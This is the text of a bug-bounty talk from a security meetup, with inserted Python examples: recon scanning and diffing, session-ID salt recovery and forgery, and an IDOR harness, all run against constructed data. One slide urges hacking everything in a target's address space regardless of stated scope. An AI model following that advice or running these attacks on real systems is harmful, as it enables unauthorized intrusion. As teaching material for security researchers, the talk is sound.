Security Meetup, 22 October. «When big brick wall becomes wooden fence» or «how to get 1kk...
#securitymeetup
“When big brick wall becomes wooden fence” or “how to get 1kk on the Bug Bounty”
#:whoami?
• Known as ‘isox’
• Web penetration tester
• QIWI CISO
• Member of “hall-of-fames” (Yandex, Mail.ru, Apple, and so on)
• JBFC participant ^___^
Hungry nomads
• Disparate groups
• Attacking every tower they see
• Using the same techniques and weapons
• Really meticulous
• Clever and creative
• You and I
Castle with gold
• Ready to pay tribute for every successful attack
• Has an enormous territory surrounding it
• Protects its citizens
• Guards its borders
• Makes friends with its neighbors
Looking at the frontend
• Huge strong (fire)walls
• Musketeers and howitzers
• Moat with crocodiles
• Perfect citizenship control at the gate
• Flawless architecture
… gentlemen, what are we waiting for?
Common assault
• 10 days for one embossed brick
• Took notice that the walls are really pregnable
• 100 gold coins of income
• Got tired and went home
I worked using Burp Suite with plugins for a week.
Why so bad?
• Most of us took weapons from the same blacksmith
• Studied martial arts at the same academy
• There are very few “unique attack techniques”
• Unless you are a black (magic) fan or can pull a dozen «PP» tricks
• All the easy ways have already been found
Just stats for one day and one vector
Let’s dot the i’s and cross the t’s
• We are not doing “security research”
• We are working for ourselves
• We came here to hack them for money
• We are legal whitehats
Bad advice №1
Illusion of good network segmentation
• It does not really matter where this RCE or SQLi is
• Common case: an injection in an auxiliary DB leads to main DB takeover through a database link
• Do you really believe that writing “don’t hack these domains” will stop anybody?
• Hack everything you can find in the target AS
Sometimes like this
Or like that
Or even like “I just hacked this IP”
Bad advice №2
Rabbits are not only fluff
• $50 is $50
• “I’m too cool for clickjacking, self-XSS, bad crossdomain.xml, POODLE, bad CSP”… forget about it
• If it is a security issue, report it
• Availability of bruteforce is also a security bug
• Missing captcha too
• Information disclosure absolutely
Sometimes $140
10 clickjacks == 1 XSS
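The small findings on this slide are cheap to check mechanically before you spend time on them by hand. The checker below is an added example, not code from the talk: it runs over a constructed set of response headers and a constructed crossdomain.xml and flags the three things listed above (a frameable page, a wildcard crossdomain.xml, and a CSP that still allows inline or any-host script). Header names and the sample policies are this example's own; validate every hit manually before reporting.

```python
"""Triage checks for the "too small to report" class of bugs (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample data, not taken from any real target.
WEAK_HEADERS = {
    "Server": "nginx",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline' *",
}
GOOD_HEADERS = {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
}
PERMISSIVE_CROSSDOMAIN = ('<?xml version="1.0"?><cross-domain-policy>'
                          '<allow-access-from domain="*"/></cross-domain-policy>')


def is_frameable(headers):
    """Clickjacking: no X-Frame-Options DENY/SAMEORIGIN and no CSP frame-ancestors."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("x-frame-options", "").strip().lower() in ("deny", "sameorigin"):
        return False
    return "frame-ancestors" not in h.get("content-security-policy", "").lower()


def crossdomain_allows_any(xml_text):
    """Flash/Silverlight policy letting any origin read responses with the victim's cookies."""
    root = ET.fromstring(xml_text)
    return any(el.get("domain") == "*" for el in root.iter("allow-access-from"))


def csp_findings(csp):
    """Weak CSP settings worth a ticket; an absent CSP is reported separately."""
    if not csp.strip():
        return []
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    # script-src falls back to default-src when absent
    script = directives.get("script-src", directives.get("default-src", []))
    findings = []
    if "'unsafe-inline'" in script:
        findings.append("script-src allows 'unsafe-inline'")
    if "*" in script:
        findings.append("script-src allows any host")
    if "object-src" not in directives and "default-src" not in directives:
        findings.append("object-src not restricted")
    return findings


def triage(headers, crossdomain_xml=None):
    """Collect the low-severity findings for one response (plus crossdomain.xml if fetched)."""
    report = []
    if is_frameable(headers):
        report.append("clickjacking: page can be framed")
    if crossdomain_xml and crossdomain_allows_any(crossdomain_xml):
        report.append('crossdomain.xml: allow-access-from domain="*"')
    csp = next((v for k, v in headers.items() if k.lower() == "content-security-policy"), "")
    report.extend(f"csp: {f}" for f in csp_findings(csp))
    return report


if __name__ == "__main__":
    print("\n".join(triage(WEAK_HEADERS, PERMISSIVE_CROSSDOMAIN)) or "clean")
```

Feed it the headers of every page that sets cookies and the crossdomain.xml of every host that serves one; a page with neither `X-Frame-Options` nor `frame-ancestors` is only a finding if it does something worth clicking, so keep the manual step.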
Bad advice №3
Enterprise toys are expensive
• Nessus SC for enterprise costs a lot, for example
• Sometimes the security team just can’t configure it well
• Or does not use it at all
• Scan it, validate it, report it!
For very nice bugs like this
Quagga is a routing software suite, providing implementations of OSPFv2, OSPFv3, RIP v1 and v2, RIPng and BGP-4 for Unix platforms, particularly FreeBSD, Linux, Solaris and NetBSD.
Good advice №1
First2discover is first2pwn
• Find your target AS-es (radar.qrator.net, for example)
• Find domains and regions (subbrute + Google)
• Automate nmap port scanning of the target AS
• Keep your eyes on the difference report
• Be the first bounty hunter to discover a new service
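The steps above are one loop: scan the target's prefixes on a schedule and read only what changed. The script below is an added example, not code from the talk; it assumes you already looked up the target's announced prefixes (for instance on radar.qrator.net) and that nmap writes grepable output with `-oG`. The two scan outputs embedded in it are constructed, using TEST-NET addresses, so the diff runs offline.

```python
"""Recon loop for "first2discover is first2pwn" (added example)."""

# Constructed prefixes; replace with the target AS's announced ranges.
PREFIXES = ["192.0.2.0/24", "198.51.100.0/24"]

# Constructed nmap -oG output for two consecutive days (tabs as nmap writes them).
YESTERDAY = """# Nmap scan report (constructed)
Host: 192.0.2.10 ()\tStatus: Up
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.6/, 443/open/tcp//https//nginx/\tIgnored State: closed (65533)
"""
TODAY = """Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.6/, 443/open/tcp//https//nginx/, 8080/open/tcp//http-proxy//Jetty/\tIgnored State: closed (65532)
Host: 192.0.2.77 ()\tPorts: 3000/open/tcp//ppp?///\tIgnored State: closed (65534)
"""


def build_scan_commands(prefixes, out_prefix="scan"):
    """One full-range SYN scan per prefix; grepable output is easy to diff later."""
    return [["nmap", "-sS", "-T4", "--open", "-p-", "-oG", f"{out_prefix}-{i}.gnmap", p]
            for i, p in enumerate(prefixes)]


def parse_gnmap(text):
    """Map host -> {(port, proto): service} for the open ports in nmap -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            # Each entry is port/state/protocol/owner/service/rpcinfo/version/
            fields = entry.strip().split("/")
            if len(fields) < 5 or fields[1] != "open":
                continue
            hosts.setdefault(host, {})[(int(fields[0]), fields[2])] = fields[4]
    return hosts


def diff_scans(old, new):
    """Hosts that appeared and ports that opened since the previous scan."""
    new_hosts = {h: p for h, p in new.items() if h not in old}
    new_ports = {}
    for host, ports in new.items():
        if host not in old:
            continue
        added = {pp: svc for pp, svc in ports.items() if pp not in old[host]}
        if added:
            new_ports[host] = added
    return new_hosts, new_ports


def report(new_hosts, new_ports):
    """Human-readable difference report, one line per host."""
    def fmt(ports):
        return ", ".join(f"{p}/{proto} {svc}" for (p, proto), svc in ports.items())
    lines = [f"NEW HOST {h}: {fmt(p)}" for h, p in new_hosts.items()]
    lines += [f"NEW PORT {h}: {fmt(p)}" for h, p in new_ports.items()]
    return lines


if __name__ == "__main__":
    for cmd in build_scan_commands(PREFIXES):
        print("would run:", " ".join(cmd))   # subprocess.run(cmd, check=True) against a real target
    print("\n".join(report(*diff_scans(parse_gnmap(YESTERDAY), parse_gnmap(TODAY)))))
```

Run the scans from cron, keep every `.gnmap`, and diff today's against yesterday's: the 8080/tcp Jetty and the new host on 3000/tcp in the constructed data are exactly the "dev, test, debug" services that show up before anyone else has looked at them.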
Dev, test, debug…yummy!
Good advice №2
We are lazy
• A RegEx for sanitizing “abG$2.###” is too much effort to write
• Huge frameworks and APIs are awesome
• Just MD5 the username and salt it with the IP, that will be the session ID
• Keep in mind that developers are humans too
• Just imagine yourself in their place
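The "MD5 the username with a salt and the IP" session ID is worth seeing fail concretely. The code below is an added example, not from the talk: a toy issuer builds session IDs exactly as the slide describes, and an attacker who holds one valid session of their own recovers a short salt offline and then forges any other user's session for a chosen IP. The usernames, IPs and the salt alphabet are constructed; the point generalizes to any session ID derived from attacker-known inputs rather than drawn from a CSPRNG.

```python
"""Forging a derived session ID (added example of the weak construction)."""
import hashlib
import itertools
import secrets
import string


def weak_session_id(username, salt, ip):
    """The construction the slide describes, kept deliberately weak."""
    return hashlib.md5(f"{username}{salt}{ip}".encode()).hexdigest()


def recover_salt(username, ip, observed_sid,
                 alphabet=string.ascii_lowercase + string.digits, max_len=3):
    """Offline brute force of a short salt from one session we legitimately own.

    Nothing is sent to the server: every guess is checked against our own
    session ID, so rate limits and lockouts never come into play.
    """
    for n in range(1, max_len + 1):
        for cand in itertools.product(alphabet, repeat=n):
            salt = "".join(cand)
            if weak_session_id(username, salt, ip) == observed_sid:
                return salt
    return None


def forge_session(victim_username, salt, victim_ip):
    """With the salt known, any user's session for any IP is computable."""
    return weak_session_id(victim_username, salt, victim_ip)


def strong_session_id():
    """What to issue instead: 256 bits from the OS CSPRNG, looked up server-side."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    # Constructed scenario: we are "isox" at 203.0.113.5 and the server's salt is "k3y".
    mine = weak_session_id("isox", "k3y", "203.0.113.5")
    salt = recover_salt("isox", "203.0.113.5", mine)
    print("recovered salt:", salt)
    print("forged session for victim:", forge_session("victim", salt, "203.0.113.9"))
    print("a real session ID looks like:", strong_session_id())
```

The victim's IP is the only unknown left after the salt falls, and the whole IPv4 space is 2^32 MD5 calls, which is minutes on a laptop; a longer salt only moves the cost, it does not fix the design. Session IDs should carry no information at all, which is what `strong_session_id` does.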
Yandex.Disk case
• What we know: our Yandex id, 229857356
• What we see in requests: _model.0=tree&id.0=/disk
• What we will try: _model.0=tree&id.0=229857356:/disk
• Profit. Access any disk by full URI, just changing its uid.
Good advice №3
Automate your ideas
• Don’t be lazy, write your own plugins
• Automate every cool vector you can create
• Automate even every good vector you can find!
• Your fuzzing and attacks must be unique
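The Yandex.Disk case above is one instance of a vector that is worth automating: rewrite a path-style parameter to the `uid:/path` form and watch whether the server serves someone else's object. The harness below is an added example, not code from the talk or from Yandex. The parameter name and the `uid:/disk` form come from the slide; the candidate uids, the listings, and the fake endpoint (one vulnerable, one fixed) are constructed so it runs offline. For a real target, replace `send` with a function built on your HTTP client or a Burp extension.

```python
"""IDOR harness for a "uid:/path" parameter (added example)."""
from urllib.parse import parse_qs, urlencode

MY_UID = "229857356"                                   # from the slide
OTHER_UIDS = ["229857357", "229857355", "100000001"]   # constructed candidates
BASE_QUERY = "_model.0=tree&id.0=/disk"                # the request seen on the slide

# Constructed per-user listings the fake endpoints serve.
_LISTINGS = {"229857356": ["photo.jpg"], "229857357": ["passport.pdf", "salary.xlsx"]}


def mutate_query(query, uid):
    """Rewrite id.0=/disk (or id.0=<old>:/disk) into id.0=<uid>:/disk, keeping other params."""
    params = parse_qs(query, keep_blank_values=True)
    path = params["id.0"][0]
    if ":" in path:
        path = path.split(":", 1)[1]
    params["id.0"] = [f"{uid}:{path}"]
    return urlencode(params, doseq=True, safe=":/")


def _uid_from_query(query, session_uid):
    target = parse_qs(query)["id.0"][0]
    return target.split(":", 1)[0] if ":" in target else session_uid


def fake_send(session_uid, query):
    """Vulnerable endpoint: trusts the uid embedded in the path, not the session."""
    uid = _uid_from_query(query, session_uid)
    if uid not in _LISTINGS:
        return 404, []
    return 200, _LISTINGS[uid]


def fixed_send(session_uid, query):
    """Hardened endpoint: the path's uid must match the authenticated session."""
    if _uid_from_query(query, session_uid) != session_uid:
        return 403, []
    return fake_send(session_uid, query)


def idor_scan(send, session_uid, base_query, candidates):
    """Return candidate uids whose object is served and differs from our own baseline."""
    _, mine = send(session_uid, base_query)
    hits = {}
    for uid in candidates:
        status, body = send(session_uid, mutate_query(base_query, uid))
        if status == 200 and body and body != mine:
            hits[uid] = body
    return hits


if __name__ == "__main__":
    print("vulnerable:", idor_scan(fake_send, MY_UID, BASE_QUERY, OTHER_UIDS))
    print("fixed:     ", idor_scan(fixed_send, MY_UID, BASE_QUERY, OTHER_UIDS))
```

Comparing each response against your own baseline, rather than just checking for a 200, is what keeps the noise down: a server that returns your own listing for any uid is not vulnerable, and a server that 404s for unknown ids is telling you which ids exist, which is a separate, smaller finding.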
Let’s try to find errors in a good way
Don’t take it all too serious
• Research new vulnerabilities
• Don’t stop working hands on. Repeater is your best friend.
• Keep learning! There is so much interesting stuff you don’t know!
• Share information with bros
• Money is nothing. Seriously.
Thanks :)
• @videns, u r a dick
• @d0znpp for good parties
• QIWI security team for the time given to write these slides
• Mail.Ru for this great evening
Email party invitations at [email protected]
QIWI IS HIRING
• Security Expert in the Application Security Team: write to [email protected]
• Security Expert in the Infrastructure Security Team: write to [email protected]
• Python programmer in Internal Development: write to [email protected]
• Welcome